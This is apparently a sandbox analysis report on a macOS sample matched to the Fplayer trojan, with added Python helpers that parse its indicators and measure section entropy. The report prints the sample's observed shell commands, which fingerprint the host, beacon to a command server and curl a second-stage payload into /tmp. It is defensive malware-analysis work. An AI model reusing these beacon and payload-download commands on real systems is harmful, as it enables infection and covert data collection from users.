macOS Analysis Report
malw_sampl

Overview

General Information

Sample name: malw_sampl
Analysis ID: 1428695
MD5: d3e39930bca4c4b57f6e1f241f0a31c8
SHA1: ca71f4ee36076497b3989e61352da70fa4dfca8b
SHA256: 02cfb65e0e38ef9ce7e431c66cdc53be3392bfe9bbed4840e18a8b30a1fd8d4a

Detection

Score: 68
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Executes commands using a shell command-line interpreter
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "defaults" command used to read or modify user specific settings
Executes the "system_profiler" command used to collect detailed system hardware and software information
Mach-O contains sections with high entropy indicating compressed/encrypted content
Queries the macOS product version
Reads hardware related sysctl values
Reads the sysctl hardware model value (potentially used for VM-detection)
Reads the systems hostname
Yara signature match

Classification

AV Detection

Source: malw_sampl Avira: detected
Source: malw_sampl Virustotal: Detection: 44%
Source: malw_sampl ReversingLabs: Detection: 34%
Source: malw_sampl Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49347 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknown HTTPS traffic detected: 17.248.193.16:443 -> 192.168.11.12:49349 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49390 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49399 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49401 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49402 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49403 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49404 version: TLS 1.2
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknown TCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknown TCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknown TCP traffic detected without corresponding DNS query: 17.253.83.196
Source: unknown TCP traffic detected without corresponding DNS query: 17.253.83.196
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: api.appsreforoma.com
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: malw_sampl String found in binary or memory: http://crl.apple.com/root.crl0
Source: malw_sampl String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: malw_sampl String found in binary or memory: http://ocsp.apple.com/ocsp-devid010
Source: malw_sampl String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: malw_sampl String found in binary or memory: http://www.apple.com/appleca0
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp String found in binary or memory: http://www.apple.com/certificateauthority0
Source: malw_sampl String found in binary or memory: https://www.apple.com/appleca/0
Source: unknown Network traffic detected: HTTP traffic on port 49399 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49403
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49347
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49402
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49401
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49345
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49389
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49388
Source: unknown Network traffic detected: HTTP traffic on port 49393 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49391 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49388 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49401 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49403 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49352 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49327 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49399
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49352
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49350
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49393
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49392
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49391
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49390
Source: unknown Network traffic detected: HTTP traffic on port 49392 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49389 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49345 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49404 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49402 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49347 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49349 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49349
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49327
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49404

System Summary

Source: malw_sampl, type: SAMPLE Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown
Source: malw_sampl, type: SAMPLE Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25
Source: classification engine Classification label: mal68.mac@0/4@4/0
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0' > /dev/null 2>&1
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }'
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1' > /dev/null 2>&1
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A 'http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593' > /dev/null 2>&1
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3' > /dev/null 2>&1
Source: /bin/sh (PID: 622) Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0
Source: /bin/sh (PID: 629) Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1
Source: /bin/sh (PID: 631) Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593
Source: /bin/sh (PID: 633) Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3
Source: /bin/sh (PID: 626) Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }
Source: submission: malw_sampl Mach-O header: load_dylib -> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 651) Random device file read: /dev/random
Source: submission CodeSign Info: Executable=/Users/bernard/Desktop/malw_sampl
Source: malw_sampl Submission file: section __const with 7.40356224 entropy (max. 8.0)
Source: /usr/sbin/system_profiler (PID: 627) Sysctl read request: hw.model (6.2)
Source: /bin/sh (PID: 623) Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
Source: /usr/sbin/system_profiler (PID: 627) Sysctl read request: hw.cpu_freq (6.15)
Source: /usr/sbin/system_profiler (PID: 627) Sysctl read request: hw.memsize (6.24)
Source: /bin/sh (PID: 621) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 623) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 624) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 628) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 630) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 632) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 625) System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataType
Source: /usr/sbin/system_profiler (PID: 625) System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full
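The "Shell command executed" records above show the sample's install-time chain: fingerprint the host (defaults read of ProductVersion, system_profiler piped through awk for the hardware UUID), beacon to api.appsreforoma.com with a session id, then fetch a second-stage file into /tmp/<session>/<uuid>. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses those records exactly as the report prints them and pulls out the indicators a responder would pivot on. The record text is copied from this report; reading the c= value on /slg as a progress counter, and the set of recon tools, are assumptions.

```python
import base64
import shlex
from urllib.parse import parse_qs, urlsplit

# Constructed input: the 'Shell command executed' records from the System
# Summary section of this report, copied as printed (the "sh -c ..." part
# only, without the "Source: ... (PID: 620)" prefix).
SHELL_COMMANDS = [
    "sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0' > /dev/null 2>&1",
    "sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion",
    "sh -c system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }'",
    "sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1' > /dev/null 2>&1",
    "sh -c curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A "
    "'http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2"
    "&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593' > /dev/null 2>&1",
    "sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3' > /dev/null 2>&1",
]

# Host-fingerprinting tools the sample drives through /bin/sh in this report
# (assumed list; extend it for other samples).
RECON_TOOLS = {"defaults", "system_profiler"}


def parse_curl(argv):
    """Describe one curl argv (URL, host, path, query dict, -o target); None if not curl."""
    if not argv or argv[0] != "curl":
        return None
    url, output = None, None
    i = 1
    while i < len(argv):
        if argv[i] == "-o" and i + 1 < len(argv):
            output = argv[i + 1]          # dropped-file path
            i += 2
            continue
        if argv[i].startswith(("http://", "https://")):
            url = argv[i]
        i += 1
    if url is None:
        return None
    parts = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"url": url, "host": parts.hostname, "path": parts.path,
            "query": query, "output": output}


def triage(commands):
    """Walk 'sh -c ...' records and collect C2 hosts, IDs, beacon order, drops, recon."""
    summary = {"hosts": set(), "session_ids": set(), "beacon_stages": [],
               "downloads": [], "recon": []}
    for line in commands:
        argv = shlex.split(line)          # handles the quoted URLs and the awk program
        if argv[:2] != ["sh", "-c"]:
            continue
        cmd = argv[2:]
        if cmd and cmd[0] in RECON_TOOLS:
            summary["recon"].append(cmd[0])
            continue
        curl = parse_curl(cmd)
        if curl is None:
            continue
        summary["hosts"].add(curl["host"])
        if "s" in curl["query"]:
            summary["session_ids"].add(curl["query"]["s"])
        if curl["path"] == "/slg":
            # c= goes 0, 1, 3 across the run; reading it as a progress counter
            # reported back to the server is an assumption.
            summary["beacon_stages"].append(curl["query"].get("c"))
        if curl["output"]:
            summary["downloads"].append({"url": curl["url"], "path": curl["output"],
                                         "params": curl["query"]})
    return summary


def decode_b64_param(value):
    """Decode a base64 query value to raw bytes (it need not be printable)."""
    return base64.b64decode(value)


if __name__ == "__main__":
    s = triage(SHELL_COMMANDS)
    print("C2 hosts:      ", sorted(s["hosts"]))
    print("session ids:   ", sorted(s["session_ids"]))
    print("beacon stages: ", s["beacon_stages"])
    print("recon tools:   ", s["recon"])
    for d in s["downloads"]:
        print("download ->    ", d["path"])
        print("  params:      ", d["params"])
        print("  c= decodes to", decode_b64_param(d["params"]["c"]))
```

Points worth noting when reading the output: the s= value is carried in every request and reused as the directory under /tmp, so it is the single best pivot across network and file telemetry; the /sd/ request embeds the value obtained from defaults read (o=10.14.2) plus a second UUID (u=) and a numeric b= value, so the server can serve per-host payloads; and c=AGFybQ== is valid base64 for the bytes 00 61 72 6d ("arm" with a leading null byte), whose meaning the report does not establish.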
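The "section __const with 7.40356224 entropy (max. 8.0)" line is the measurement behind the "Mach-O contains sections with high entropy" signature. The Python below is an added example, not part of the report or of the sandbox: it computes the Shannon entropy that check relies on, applies it per section, and adds a windowed scan that catches a small packed or encrypted blob that a whole-section average would hide. The section contents are constructed here; reading real section bytes out of a Mach-O (for example from the offsets otool -l prints) is left out, and the 7.0 flag threshold is an assumption.

```python
import math
from collections import Counter

HIGH_ENTROPY = 7.0   # assumed flag threshold; the report prints 7.40 for __const


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def flag_sections(sections, threshold=HIGH_ENTROPY):
    """sections: iterable of (name, bytes). Returns [(name, entropy)] above threshold."""
    flagged = []
    for name, blob in sections:
        h = shannon_entropy(blob)
        if h > threshold:
            flagged.append((name, round(h, 3)))
    return flagged


def high_entropy_windows(data, window=256, threshold=HIGH_ENTROPY):
    """Offsets of non-overlapping windows whose entropy exceeds threshold.
    A short encrypted blob inside a mostly-zero section pulls the section
    average below the threshold, but the blob still shows up here."""
    return [off for off in range(0, len(data) - window + 1, window)
            if shannon_entropy(data[off:off + window]) > threshold]


# Constructed section contents (not from the sample):
UNIFORM = bytes(range(256)) * 16                       # every byte value equally often -> 8.0
TEXT = b"Reads the sysctl hardware model value and the system hostname. " * 20
MIXED = b"\x00" * 1024 + bytes(range(256)) * 2 + b"\x00" * 1024   # 512-byte blob in zeros
SECTIONS = [("__text", TEXT), ("__const", UNIFORM), ("__data", MIXED)]

if __name__ == "__main__":
    for name, blob in SECTIONS:
        print(f"{name:8s} entropy={shannon_entropy(blob):.3f} "
              f"hot windows={high_entropy_windows(blob)}")
    print("flagged:", flag_sections(SECTIONS))
```

The per-section number is what the signature reports; the windowed scan is the follow-up a reverser wants, because it gives the offset of the region to dump and inspect rather than a single average for the section.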